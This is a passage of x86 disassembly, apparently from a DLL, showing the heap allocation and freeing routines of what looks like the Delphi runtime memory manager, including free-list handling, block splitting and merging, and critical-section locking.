loc_10001887: ; CODE XREF: sub_10001834+6B�j
push 8000h
push 0
mov eax, [ebx+8]
push eax
call sub_100010BC ; VirtualFree
mov ebx, [ebx]
loc_10001899: ; CODE XREF: sub_10001834+51�j
cmp ebx, offset off_100055D0
jnz short loc_10001887
mov eax, offset off_100055D0
call sub_10001134
mov eax, offset off_100055E0
call sub_10001134
mov eax, offset off_1000560C
call sub_10001134
mov eax, ds:dword_100055C8
test eax, eax
jz short loc_100018DF
loc_100018C8: ; CODE XREF: sub_10001834+A9�j
mov edx, [eax]
mov ds:dword_100055C8, edx
push eax
call sub_100010AC ; LocalFree
mov eax, ds:dword_100055C8
test eax, eax
jnz short loc_100018C8
loc_100018DF: ; CODE XREF: sub_10001834+92�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10001911
loc_100018EC: ; CODE XREF: sub_10001834+DB�j
cmp ds:byte_10005035, 0
jz short loc_100018FF
push offset dword_100055B0
call sub_100010D4 ; RtlLeaveCriticalSection
loc_100018FF: ; CODE XREF: sub_10001834+BF�j
push offset dword_100055B0
call sub_100010DC ; RtlDeleteCriticalSection
retn
; ---------------------------------------------------------------------------
loc_1000190A: ; DATA XREF: sub_10001834+14�o
jmp loc_10002A5C
; ---------------------------------------------------------------------------
jmp short loc_100018EC
; ---------------------------------------------------------------------------
loc_10001911: ; CODE XREF: sub_10001834+B�j
; DATA XREF: sub_10001834+B3�o
pop ebx
pop ebp
retn
sub_10001834 endp
; =============== S U B R O U T I N E =======================================
sub_10001914 proc near ; CODE XREF: sub_10001A24:loc_10001A85�p
; sub_10001A94+23�p ...
push ebx
cmp eax, ds:dword_100055FC
jnz short loc_10001926
mov edx, [eax+4]
mov ds:dword_100055FC, edx
loc_10001926: ; CODE XREF: sub_10001914+7�j
mov edx, [eax+4]
mov ecx, [eax+8]
cmp ecx, 1000h
jg short loc_1000196C
cmp eax, edx
jnz short loc_1000194F
test ecx, ecx
jns short loc_1000193F
add ecx, 3
loc_1000193F: ; CODE XREF: sub_10001914+26�j
sar ecx, 2
mov eax, ds:dword_10005608
xor edx, edx
mov [eax+ecx*4-0Ch], edx
jmp short loc_10001973
; ---------------------------------------------------------------------------
loc_1000194F: ; CODE XREF: sub_10001914+22�j
test ecx, ecx
jns short loc_10001956
add ecx, 3
loc_10001956: ; CODE XREF: sub_10001914+3D�j
sar ecx, 2
mov ebx, ds:dword_10005608
mov [ebx+ecx*4-0Ch], edx
mov eax, [eax]
mov [edx], eax
mov [eax+4], edx
pop ebx
retn
; ---------------------------------------------------------------------------
loc_1000196C: ; CODE XREF: sub_10001914+1E�j
mov eax, [eax]
mov [edx], eax
mov [eax+4], edx
loc_10001973: ; CODE XREF: sub_10001914+39�j
pop ebx
retn
sub_10001914 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001978 proc near ; CODE XREF: sub_10001ACC+11�p
mov edx, ds:off_1000560C
jmp short loc_10001990
; ---------------------------------------------------------------------------
loc_10001980: ; CODE XREF: sub_10001978+1E�j
mov ecx, [edx+8]
cmp eax, ecx
jb short loc_1000198E
add ecx, [edx+0Ch]
cmp eax, ecx
jb short loc_100019A4
loc_1000198E: ; CODE XREF: sub_10001978+D�j
mov edx, [edx]
loc_10001990: ; CODE XREF: sub_10001978+6�j
cmp edx, offset off_1000560C
jnz short loc_10001980
mov ds:dword_100055AC, 3
xor edx, edx
loc_100019A4: ; CODE XREF: sub_10001978+14�j
mov eax, edx
retn
sub_10001978 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100019A8 proc near ; CODE XREF: sub_10001ACC+74�p
; sub_10001C50+68�p
push ebx
mov ecx, edx
sub ecx, 4
lea ebx, [ecx+eax]
cmp edx, 10h
jl short loc_100019C5
mov dword ptr [ebx], 80000007h
mov edx, ecx
call sub_10001B7C
pop ebx
retn
; ---------------------------------------------------------------------------
loc_100019C5: ; CODE XREF: sub_100019A8+C�j
cmp edx, 4
jl short loc_100019D6
mov ecx, edx
or ecx, 80000002h
mov [eax], ecx
mov [ebx], ecx
loc_100019D6: ; CODE XREF: sub_100019A8+20�j
pop ebx
retn
sub_100019A8 endp
; =============== S U B R O U T I N E =======================================
sub_100019D8 proc near ; CODE XREF: sub_100019FC+D�p
; sub_10001C04+36�p ...
inc ds:dword_1000559C
mov edx, eax
sub edx, 4
mov edx, [edx]
and edx, 7FFFFFFCh
sub edx, 4
add ds:dword_100055A0, edx
call sub_10001FEC
retn
sub_100019D8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100019FC proc near ; CODE XREF: sub_10001ACC+8E�p
cmp edx, 0Ch
jl short loc_10001A0F
or edx, 2
mov [eax], edx
add eax, 4
call sub_100019D8
retn
; ---------------------------------------------------------------------------
loc_10001A0F: ; CODE XREF: sub_100019FC+3�j
cmp edx, 4
jl short loc_10001A1E
mov ecx, edx
or ecx, 80000002h
mov [eax], ecx
loc_10001A1E: ; CODE XREF: sub_100019FC+16�j
add eax, edx
and dword ptr [eax], 0FFFFFFFEh
retn
sub_100019FC endp
; =============== S U B R O U T I N E =======================================
sub_10001A24 proc near ; CODE XREF: sub_10001C50+36�p
push ebx
push esi
mov edx, eax
sub edx, 4
mov edx, [edx]
mov ecx, edx
and ecx, 80000002h
cmp ecx, 80000002h
jz short loc_10001A47
mov ds:dword_100055AC, 4
loc_10001A47: ; CODE XREF: sub_10001A24+17�j
mov ebx, edx
and ebx, 7FFFFFFCh
sub eax, ebx
mov ecx, eax
xor edx, [ecx]
test edx, 0FFFFFFFEh
jz short loc_10001A67
mov ds:dword_100055AC, 5
loc_10001A67: ; CODE XREF: sub_10001A24+37�j
test byte ptr [ecx], 1
jz short loc_10001A8C
mov edx, eax
sub edx, 0Ch
mov esi, [edx+8]
sub eax, esi
cmp esi, [eax+8]
jz short loc_10001A85
mov ds:dword_100055AC, 6
loc_10001A85: ; CODE XREF: sub_10001A24+55�j
call sub_10001914
add ebx, esi
loc_10001A8C: ; CODE XREF: sub_10001A24+46�j
mov eax, ebx
pop esi
pop ebx
retn
sub_10001A24 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001A94 proc near ; CODE XREF: sub_10001C50+4F�p
push ebx
push esi
push edi
mov ebx, eax
xor edi, edi
mov eax, [ebx]
test eax, 80000000h
jz short loc_10001AAF
and eax, 7FFFFFFCh
add edi, eax
add ebx, eax
mov eax, [ebx]
loc_10001AAF: ; CODE XREF: sub_10001A94+E�j
test al, 2
jnz short loc_10001AC6
mov esi, ebx
mov eax, esi
call sub_10001914
mov eax, [esi+8]
add edi, eax
add ebx, eax
and dword ptr [ebx], 0FFFFFFFEh
loc_10001AC6: ; CODE XREF: sub_10001A94+1D�j
mov eax, edi
pop edi
pop esi
pop ebx
retn
sub_10001A94 endp
; =============== S U B R O U T I N E =======================================
sub_10001ACC proc near ; CODE XREF: sub_10001B7C+61�p
var_1C = byte ptr -1Ch
var_1B = dword ptr -1Bh
var_17 = dword ptr -17h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF4h
mov edi, edx
mov esi, eax
mov [esp+1Ch+var_1C], 0
mov eax, esi
call sub_10001978
mov ebx, eax
test ebx, ebx
jz loc_10001B6E
mov ebp, [ebx+8]
mov eax, ebp
add eax, [ebx+0Ch]
mov edx, eax
lea ecx, [edi+esi]
sub edx, ecx
cmp edx, 0Ch
jg short loc_10001B04
mov edi, eax
sub edi, esi
loc_10001B04: ; CODE XREF: sub_10001ACC+32�j
mov eax, esi
sub eax, ebp
cmp eax, 0Ch
jge short loc_10001B21
lea ecx, [esp+1Ch+var_1B]
mov edx, esi
sub edx, [ebx+8]
add edx, edi
mov eax, ebp
call sub_100016E4
jmp short loc_10001B32
; ---------------------------------------------------------------------------
loc_10001B21: ; CODE XREF: sub_10001ACC+3F�j
lea ecx, [esp+1Ch+var_1B]
mov edx, edi
sub edx, 4
lea eax, [esi+4]
call sub_100016E4
loc_10001B32: ; CODE XREF: sub_10001ACC+53�j
mov ebp, [esp+1Ch+var_1B]
test ebp, ebp
jz short loc_10001B6E
mov edx, ebp
sub edx, esi
mov eax, esi
call sub_100019A8
mov eax, ebp
add eax, [esp+1Ch+var_17]
mov edx, [ebx+8]
add edx, [ebx+0Ch]
cmp eax, edx
jnb short loc_10001B5F
lea edx, [edi+esi]
sub edx, eax
call sub_100019FC
loc_10001B5F: ; CODE XREF: sub_10001ACC+87�j
lea edx, [esp+1Ch+var_1B]
mov eax, ebx
call sub_100011F8
mov [esp+1Ch+var_1C], 1
loc_10001B6E: ; CODE XREF: sub_10001ACC+1A�j
; sub_10001ACC+6C�j
mov al, [esp+1Ch+var_1C]
add esp, 0Ch
pop ebp
pop edi
pop esi
pop ebx
retn
sub_10001ACC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001B7C proc near ; CODE XREF: sub_100019A8+16�p
; sub_10001D68+BB�p ...
push ebx
push esi
push edi
mov esi, edx
mov edi, eax
mov ebx, edi
mov [ebx+8], esi
mov eax, ebx
add eax, esi
sub eax, 0Ch
mov [eax+8], esi
cmp esi, 1000h
jg short loc_10001BD1
mov edx, esi
test edx, edx
jns short loc_10001BA3
add edx, 3
loc_10001BA3: ; CODE XREF: sub_10001B7C+22�j
sar edx, 2
mov eax, ds:dword_10005608
mov eax, [eax+edx*4-0Ch]
test eax, eax
jnz short loc_10001BC3
mov eax, ds:dword_10005608
mov [eax+edx*4-0Ch], ebx
mov [ebx+4], ebx
mov [ebx], ebx
jmp short loc_10001BFD
; ---------------------------------------------------------------------------
loc_10001BC3: ; CODE XREF: sub_10001B7C+35�j
mov edx, [eax]
mov [ebx+4], eax
mov [ebx], edx
mov [eax], ebx
mov [edx+4], ebx
jmp short loc_10001BFD
; ---------------------------------------------------------------------------
loc_10001BD1: ; CODE XREF: sub_10001B7C+1C�j
cmp esi, 3C00h
jl short loc_10001BE6
mov edx, esi
mov eax, edi
call sub_10001ACC
test al, al
jnz short loc_10001BFD
loc_10001BE6: ; CODE XREF: sub_10001B7C+5B�j
mov eax, ds:dword_100055FC
mov ds:dword_100055FC, ebx
mov edx, [eax]
mov [ebx+4], eax
mov [ebx], edx
mov [eax], ebx
mov [edx+4], ebx
loc_10001BFD: ; CODE XREF: sub_10001B7C+45�j
; sub_10001B7C+53�j ...
pop edi
pop esi
pop ebx
retn
sub_10001B7C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001C04 proc near ; CODE XREF: sub_10001C50+F�p
; sub_10001FEC+100�p ...
cmp ds:dword_10005600, 0
jle short locret_10001C4D
cmp ds:dword_10005600, 0Ch
jge short loc_10001C22
mov ds:dword_100055AC, 7
jmp short locret_10001C4D
; ---------------------------------------------------------------------------
loc_10001C22: ; CODE XREF: sub_10001C04+10�j
mov eax, ds:dword_10005600
or eax, 2
mov edx, ds:dword_10005604
mov [edx], eax
mov eax, ds:dword_10005604
add eax, 4
call sub_100019D8
xor eax, eax
mov ds:dword_10005604, eax
xor eax, eax
mov ds:dword_10005600, eax
locret_10001C4D: ; CODE XREF: sub_10001C04+7�j
; sub_10001C04+1C�j
retn
sub_10001C04 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10001C50 proc near ; CODE XREF: sub_10001CDC+18�p
; sub_10001D08+1D�p
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
push ebx
push esi
push edi
add esp, 0FFFFFFF0h
mov esi, eax
lea edi, [esp+1Ch+var_1C]
movsd
movsd
mov edi, esp
call sub_10001C04
lea ecx, [esp+1Ch+var_14]
mov edx, edi
mov eax, offset off_1000560C
call sub_10001184
mov ebx, [esp+1Ch+var_14]
test ebx, ebx
jnz short loc_10001C80
xor eax, eax
jmp short loc_10001CD2
; ---------------------------------------------------------------------------
loc_10001C80: ; CODE XREF: sub_10001C50+2A�j
mov eax, [edi]
cmp ebx, eax
jnb short loc_10001C90
call sub_10001A24
sub [edi], eax
add [edi+4], eax
loc_10001C90: ; CODE XREF: sub_10001C50+34�j
mov eax, [edi]
add eax, [edi+4]
mov esi, ebx
add esi, [esp+1Ch+var_10]
cmp eax, esi
jnb short loc_10001CA7
call sub_10001A94
add [edi+4], eax
loc_10001CA7: ; CODE XREF: sub_10001C50+4D�j
mov eax, [edi]
add eax, [edi+4]
cmp esi, eax
jnz short loc_10001CC1
sub eax, 4
mov edx, 4
call sub_100019A8
sub dword ptr [edi+4], 4
loc_10001CC1: ; CODE XREF: sub_10001C50+5E�j
mov eax, [edi]
mov ds:dword_10005604, eax
mov eax, [edi+4]
mov ds:dword_10005600, eax
mov al, 1
loc_10001CD2: ; CODE XREF: sub_10001C50+2E�j
add esp, 10h
pop edi
pop esi
pop ebx
retn
sub_10001C50 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001CDC proc near ; CODE XREF: sub_10001D68+57�p
var_C = dword ptr -0Ch
push ebx
add esp, 0FFFFFFF8h
mov ebx, eax
mov edx, esp
lea eax, [ebx+4]
call sub_10001530
cmp [esp+0Ch+var_C], 0
jz short loc_10001CFD
mov eax, esp
call sub_10001C50
test al, al
jnz short loc_10001D01
loc_10001CFD: ; CODE XREF: sub_10001CDC+14�j
xor eax, eax
jmp short loc_10001D03
; ---------------------------------------------------------------------------
loc_10001D01: ; CODE XREF: sub_10001CDC+1F�j
mov al, 1
loc_10001D03: ; CODE XREF: sub_10001CDC+23�j
pop ecx
pop edx
pop ebx
retn
sub_10001CDC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001D08 proc near ; CODE XREF: sub_10002190+199�p
var_10 = dword ptr -10h
push ebx
push esi
add esp, 0FFFFFFF8h
mov esi, edx
mov ebx, eax
mov ecx, esp
lea edx, [esi+4]
mov eax, ebx
call sub_100015C0
cmp [esp+10h+var_10], 0
jz short loc_10001D2E
mov eax, esp
call sub_10001C50
test al, al
jnz short loc_10001D32
loc_10001D2E: ; CODE XREF: sub_10001D08+19�j
xor eax, eax
jmp short loc_10001D34
; ---------------------------------------------------------------------------
loc_10001D32: ; CODE XREF: sub_10001D08+24�j
mov al, 1
loc_10001D34: ; CODE XREF: sub_10001D08+28�j
pop ecx
pop edx
pop esi
pop ebx
retn
sub_10001D08 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001D3C proc near ; CODE XREF: sub_10001D68+4A�p
xor edx, edx
test eax, eax
jns short loc_10001D45
add eax, 3
loc_10001D45: ; CODE XREF: sub_10001D3C+4�j
sar eax, 2
cmp eax, 400h
jg short loc_10001D65
loc_10001D4F: ; CODE XREF: sub_10001D3C+27�j
mov edx, ds:dword_10005608
mov edx, [edx+eax*4-0Ch]
test edx, edx
jnz short loc_10001D65
inc eax
cmp eax, 401h
jnz short loc_10001D4F
loc_10001D65: ; CODE XREF: sub_10001D3C+11�j
; sub_10001D3C+1F�j
mov eax, edx
retn
sub_10001D3C endp
; =============== S U B R O U T I N E =======================================
sub_10001D68 proc near ; CODE XREF: sub_10001E5C+153�p
push ebx
push esi
push edi
push ebp
mov esi, eax
mov edi, offset dword_100055FC
mov ebp, offset dword_10005600
loc_10001D78: ; CODE XREF: sub_10001D68+6A�j
mov ebx, ds:dword_100055F4
cmp esi, [ebx+8]
jle loc_10001E0B
mov ebx, [edi]
mov eax, [ebx+8]
cmp esi, eax
jle short loc_10001E0B
mov [ebx+8], esi
loc_10001D93: ; CODE XREF: sub_10001D68+31�j
mov ebx, [ebx+4]
cmp esi, [ebx+8]
jg short loc_10001D93
mov edx, [edi]
mov [edx+8], eax
cmp ebx, [edi]
jz short loc_10001DA8
mov [edi], ebx
jmp short loc_10001E0B
; ---------------------------------------------------------------------------
loc_10001DA8: ; CODE XREF: sub_10001D68+3A�j
cmp esi, 1000h
jg short loc_10001DBD
mov eax, esi
call sub_10001D3C
mov ebx, eax
test ebx, ebx
jnz short loc_10001E0B
loc_10001DBD: ; CODE XREF: sub_10001D68+46�j
mov eax, esi
call sub_10001CDC
test al, al
jnz short loc_10001DCF
xor eax, eax
jmp loc_10001E57
; ---------------------------------------------------------------------------
loc_10001DCF: ; CODE XREF: sub_10001D68+5E�j
cmp esi, [ebp+0]
jg short loc_10001D78
sub [ebp+0], esi
cmp dword ptr [ebp+0], 0Ch
jge short loc_10001DE5
add esi, [ebp+0]
xor eax, eax
mov [ebp+0], eax
loc_10001DE5: ; CODE XREF: sub_10001D68+73�j
mov eax, ds:dword_10005604
add ds:dword_10005604, esi
mov edx, esi
or edx, 2
mov [eax], edx
add eax, 4
inc ds:dword_1000559C
sub esi, 4
add ds:dword_100055A0, esi
jmp short loc_10001E57
; ---------------------------------------------------------------------------
loc_10001E0B: ; CODE XREF: sub_10001D68+19�j
; sub_10001D68+26�j ...
mov eax, ebx
call sub_10001914
mov edx, [ebx+8]
mov eax, edx
sub eax, esi
cmp eax, 0Ch
jl short loc_10001E2A
mov edx, ebx
add edx, esi
xchg eax, edx
call sub_10001B7C
jmp short loc_10001E3C
; ---------------------------------------------------------------------------
loc_10001E2A: ; CODE XREF: sub_10001D68+B4�j
mov esi, edx
cmp ebx, [edi]
jnz short loc_10001E35
mov eax, [ebx+4]
mov [edi], eax
loc_10001E35: ; CODE XREF: sub_10001D68+C6�j
mov eax, ebx
add eax, esi
and dword ptr [eax], 0FFFFFFFEh
loc_10001E3C: ; CODE XREF: sub_10001D68+C0�j
mov eax, ebx
mov edx, esi
or edx, 2
mov [eax], edx
add eax, 4
inc ds:dword_1000559C
sub esi, 4
add ds:dword_100055A0, esi
loc_10001E57: ; CODE XREF: sub_10001D68+62�j
; sub_10001D68+A1�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_10001D68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001E5C proc near ; CODE XREF: sub_10002360+5C�p
; sub_10002424+5�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov ebx, eax
cmp ds:byte_100055A8, 0
jnz short loc_10001E79
call sub_10001770
test al, al
jz short loc_10001E81
loc_10001E79: ; CODE XREF: sub_10001E5C+12�j
cmp ebx, 7FFFFFF8h
jle short loc_10001E8B
loc_10001E81: ; CODE XREF: sub_10001E5C+1B�j
xor eax, eax
mov [ebp+var_4], eax
jmp loc_10001FDF
; ---------------------------------------------------------------------------
loc_10001E8B: ; CODE XREF: sub_10001E5C+23�j
xor ecx, ecx
push ebp
push offset loc_10001FD8
push dword ptr fs:[ecx]
mov fs:[ecx], esp
cmp ds:byte_10005035, 0
jz short loc_10001EAC
push offset dword_100055B0
call sub_100010CC ; RtlEnterCriticalSection
loc_10001EAC: ; CODE XREF: sub_10001E5C+44�j
add ebx, 7
and ebx, 0FFFFFFFCh
cmp ebx, 0Ch
jge short loc_10001EBC
mov ebx, 0Ch
loc_10001EBC: ; CODE XREF: sub_10001E5C+59�j
cmp ebx, 1000h
jg loc_10001F5B
mov eax, ebx
test eax, eax
jns short loc_10001ED1
add eax, 3
loc_10001ED1: ; CODE XREF: sub_10001E5C+70�j
sar eax, 2
mov edx, ds:dword_10005608
mov edx, [edx+eax*4-0Ch]
test edx, edx
jz short loc_10001F5B
mov esi, edx
mov eax, esi
add eax, ebx
and dword ptr [eax], 0FFFFFFFEh
mov eax, [edx+4]
cmp edx, eax
jnz short loc_10001F0C
mov eax, ebx
test eax, eax
jns short loc_10001EFB
add eax, 3
loc_10001EFB: ; CODE XREF: sub_10001E5C+9A�j
sar eax, 2
mov ecx, ds:dword_10005608
xor edi, edi
mov [ecx+eax*4-0Ch], edi
jmp short loc_10001F32
; ---------------------------------------------------------------------------
loc_10001F0C: ; CODE XREF: sub_10001E5C+94�j
mov ecx, ebx
test ecx, ecx
jns short loc_10001F15
add ecx, 3
loc_10001F15: ; CODE XREF: sub_10001E5C+B4�j
sar ecx, 2
mov edi, ds:dword_10005608
mov [edi+ecx*4-0Ch], eax
mov ecx, [edx]
mov [ebp+var_8], ecx
mov ecx, [ebp+var_8]
mov [ecx+4], eax
mov ecx, [ebp+var_8]
mov [eax], ecx
loc_10001F32: ; CODE XREF: sub_10001E5C+AE�j
mov eax, esi
mov edx, [edx+8]
or edx, 2
mov [eax], edx
add eax, 4
mov [ebp+var_4], eax
inc ds:dword_1000559C
sub ebx, 4
add ds:dword_100055A0, ebx
call sub_10002B18
jmp loc_10001FDF
; ---------------------------------------------------------------------------
loc_10001F5B: ; CODE XREF: sub_10001E5C+66�j
; sub_10001E5C+84�j
cmp ebx, ds:dword_10005600
jg short loc_10001FAD
sub ds:dword_10005600, ebx
cmp ds:dword_10005600, 0Ch
jge short loc_10001F7F
add ebx, ds:dword_10005600
xor eax, eax
mov ds:dword_10005600, eax
loc_10001F7F: ; CODE XREF: sub_10001E5C+114�j
mov eax, ds:dword_10005604
add ds:dword_10005604, ebx
mov edx, ebx
or edx, 2
mov [eax], edx
add eax, 4
mov [ebp+var_4], eax
inc ds:dword_1000559C
sub ebx, 4
add ds:dword_100055A0, ebx
call sub_10002B18
jmp short loc_10001FDF
; ---------------------------------------------------------------------------
loc_10001FAD: ; CODE XREF: sub_10001E5C+105�j
mov eax, ebx
call sub_10001D68
mov [ebp+var_4], eax
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10001FDF
loc_10001FC4: ; CODE XREF: sub_10001E5C+181�j
cmp ds:byte_10005035, 0
jz short locret_10001FD7
push offset dword_100055B0
call sub_100010D4 ; RtlLeaveCriticalSection
locret_10001FD7: ; CODE XREF: sub_10001E5C+16F�j
retn
; ---------------------------------------------------------------------------
loc_10001FD8: ; DATA XREF: sub_10001E5C+32�o
jmp loc_10002A5C
; ---------------------------------------------------------------------------
jmp short loc_10001FC4
; ---------------------------------------------------------------------------
loc_10001FDF: ; CODE XREF: sub_10001E5C+2A�j
; sub_10001E5C+FA�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_10001E5C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001FEC proc near ; CODE XREF: sub_100019D8+1C�p
; sub_10002360+88�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov ebx, eax
xor eax, eax
mov ds:dword_100055AC, eax
cmp ds:byte_100055A8, 0
jnz short loc_10002024
call sub_10001770
test al, al
jnz short loc_10002024
mov ds:dword_100055AC, 8
mov [ebp+var_4], 8
jmp loc_10002185
; ---------------------------------------------------------------------------
loc_10002024: ; CODE XREF: sub_10001FEC+17�j
; sub_10001FEC+20�j
xor ecx, ecx
push ebp
push offset loc_1000217E
push dword ptr fs:[ecx]
mov fs:[ecx], esp
cmp ds:byte_10005035, 0
jz short loc_10002045
push offset dword_100055B0
call sub_100010CC ; RtlEnterCriticalSection
loc_10002045: ; CODE XREF: sub_10001FEC+4D�j
mov esi, ebx
sub esi, 4
mov ebx, [esi]
test bl, 2
jnz short loc_10002060
mov ds:dword_100055AC, 9
jmp loc_10002155
; ---------------------------------------------------------------------------
loc_10002060: ; CODE XREF: sub_10001FEC+63�j
dec ds:dword_1000559C
mov eax, ebx
and eax, 7FFFFFFCh
sub eax, 4
sub ds:dword_100055A0, eax
test bl, 1
jz short loc_100020C0
mov eax, esi
sub eax, 0Ch
mov edx, [eax+8]
cmp edx, 0Ch
jl short loc_10002090
test edx, 80000003h
jz short loc_1000209F
loc_10002090: ; CODE XREF: sub_10001FEC+9A�j
mov ds:dword_100055AC, 0Ah
jmp loc_10002155
; ---------------------------------------------------------------------------
loc_1000209F: ; CODE XREF: sub_10001FEC+A2�j
mov eax, esi
sub eax, edx
cmp edx, [eax+8]
jz short loc_100020B7
mov ds:dword_100055AC, 0Ah
jmp loc_10002155
; ---------------------------------------------------------------------------
loc_100020B7: ; CODE XREF: sub_10001FEC+BA�j
add ebx, edx
mov esi, eax
call sub_10001914
loc_100020C0: ; CODE XREF: sub_10001FEC+8D�j
and ebx, 7FFFFFFCh
mov eax, esi
add eax, ebx
mov edi, eax
cmp edi, ds:dword_10005604
jnz short loc_10002100
sub ds:dword_10005604, ebx
add ds:dword_10005600, ebx
cmp ds:dword_10005600, 3C00h
jle short loc_100020F1
call sub_10001C04
loc_100020F1: ; CODE XREF: sub_10001FEC+FE�j
xor eax, eax
mov [ebp+var_4], eax
call sub_10002B18
jmp loc_10002185
; ---------------------------------------------------------------------------
loc_10002100: ; CODE XREF: sub_10001FEC+E6�j
mov edx, [eax]
test dl, 2
jz short loc_10002123
and edx, 7FFFFFFCh
cmp edx, 4
jge short loc_1000211E
mov ds:dword_100055AC, 0Bh
jmp short loc_10002155
; ---------------------------------------------------------------------------
loc_1000211E: ; CODE XREF: sub_10001FEC+124�j
or dword ptr [eax], 1
jmp short loc_1000214C
; ---------------------------------------------------------------------------
loc_10002123: ; CODE XREF: sub_10001FEC+119�j
mov eax, edi
cmp dword ptr [eax+4], 0
jz short loc_10002136
cmp dword ptr [eax], 0
jz short loc_10002136
cmp dword ptr [eax+8], 0Ch
jge short loc_10002142
loc_10002136: ; CODE XREF: sub_10001FEC+13D�j
; sub_10001FEC+142�j
mov ds:dword_100055AC, 0Bh
jmp short loc_10002155
; ---------------------------------------------------------------------------
loc_10002142: ; CODE XREF: sub_10001FEC+148�j
mov edx, [eax+8]
add ebx, edx
call sub_10001914
loc_1000214C: ; CODE XREF: sub_10001FEC+135�j
mov edx, ebx
mov eax, esi
call sub_10001B7C
loc_10002155: ; CODE XREF: sub_10001FEC+6F�j
; sub_10001FEC+AE�j ...
mov eax, ds:dword_100055AC
mov [ebp+var_4], eax
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10002185
loc_1000216A: ; CODE XREF: sub_10001FEC+197�j
cmp ds:byte_10005035, 0
jz short locret_1000217D
push offset dword_100055B0
call sub_100010D4 ; RtlLeaveCriticalSection
locret_1000217D: ; CODE XREF: sub_10001FEC+185�j
retn
; ---------------------------------------------------------------------------
loc_1000217E: ; DATA XREF: sub_10001FEC+3B�o
jmp loc_10002A5C
; ---------------------------------------------------------------------------
jmp short loc_1000216A
; ---------------------------------------------------------------------------
loc_10002185: ; CODE XREF: sub_10001FEC+33�j
; sub_10001FEC+10F�j
; DATA XREF: ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn
sub_10001FEC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10002190 proc near ; CODE XREF: sub_10002360+4C�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF8h
mov esi, edx
add esi, 7
and esi, 0FFFFFFFCh
cmp esi, 0Ch
jge short loc_100021A9
mov esi, 0Ch
loc_100021A9: ; CODE XREF: sub_10002190+12�j
mov ebp, eax
sub ebp, 4
mov edi, [ebp+0]
and edi, 7FFFFFFCh
mov eax, ebp
add eax, edi
mov ebx, eax
cmp edi, esi
jl loc_10002248
mov edx, edi
sub edx, esi
mov [esp+18h+var_18], edx
cmp ebx, ds:dword_10005604
jnz short loc_1000220C
mov eax, [esp+18h+var_18]
sub ds:dword_10005604, eax
mov eax, [esp+18h+var_18]
add ds:dword_10005600, eax
cmp ds:dword_10005600, 0Ch
jge loc_1000233F
mov eax, [esp+18h+var_18]
add ds:dword_10005604, eax
mov eax, [esp+18h+var_18]
sub ds:dword_10005600, eax
mov esi, edi
jmp loc_1000233F
; ---------------------------------------------------------------------------
loc_1000220C: ; CODE XREF: sub_10002190+42�j
mov ebx, eax
test byte ptr [ebx], 2
jnz short loc_10002220
mov eax, ebx
mov edx, [eax+8]
add [esp+18h+var_18], edx
call sub_10001914
loc_10002220: ; CODE XREF: sub_10002190+81�j
cmp [esp+18h+var_18], 0Ch
jl short loc_10002241
mov ebx, ebp
add ebx, esi
mov eax, [esp+18h+var_18]
or eax, 2
mov [ebx], eax
mov eax, ebx
add eax, 4
call sub_100019D8
jmp loc_1000233F
; ---------------------------------------------------------------------------
loc_10002241: ; CODE XREF: sub_10002190+94�j
mov esi, edi
jmp loc_1000233F
; ---------------------------------------------------------------------------
loc_10002248: ; CODE XREF: sub_10002190+2F�j
; sub_10002190+1A6�j
mov eax, esi
sub eax, edi
mov [esp+18h+var_14], eax
cmp ebx, ds:dword_10005604
jnz short loc_100022BF
mov eax, ds:dword_10005600
cmp eax, [esp+18h+var_14]
jl short loc_100022B6
mov eax, [esp+18h+var_14]
sub ds:dword_10005600, eax
mov eax, [esp+18h+var_14]
add ds:dword_10005604, eax
cmp ds:dword_10005600, 0Ch
jge short loc_10002298
mov eax, ds:dword_10005600
add ds:dword_10005604, eax
add esi, ds:dword_10005600
xor eax, eax
mov ds:dword_10005600, eax
loc_10002298: ; CODE XREF: sub_10002190+EE�j
mov eax, esi
sub eax, edi
add ds:dword_100055A0, eax
mov eax, [ebp+0]
and eax, 80000003h
or esi, eax
mov [ebp+0], esi
mov al, 1
jmp loc_10002358
; ---------------------------------------------------------------------------
loc_100022B6: ; CODE XREF: sub_10002190+D1�j
call sub_10001C04
mov ebx, ebp
add ebx, edi
loc_100022BF: ; CODE XREF: sub_10002190+C6�j
test byte ptr [ebx], 2
jnz short loc_10002311
mov edx, ebx
mov eax, edx
mov ecx, [eax+8]
mov [esp+18h+var_18], ecx
mov ecx, [esp+18h+var_18]
cmp ecx, [esp+18h+var_14]
